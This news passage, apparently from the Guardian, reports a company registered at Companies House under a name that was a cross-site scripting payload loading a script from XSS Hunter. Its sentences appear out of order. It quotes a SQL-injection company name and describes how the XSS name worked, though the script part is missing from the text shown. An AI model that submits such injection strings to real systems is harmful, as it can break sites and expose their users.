“When I discovered there were some minor problems, I contacted Companies House and the National Cyber Security Centre immediately, and didn’t disclose the issue to anyone else.” The director of the company, who asked not to be named, told the Guardian: “Government Digital Service - GDS - have a good reputation for security, and other companies with similarly playful names have been registered in the past, so I thought there probably wouldn’t be a problem. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply “Company name available on request”. Similar names have been registered in the past, such as “ DROP TABLE “COMPANIES” - LTD”, a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.
By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
The original name of the company was ““> LTD”.
He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.
0 kommentar(er)
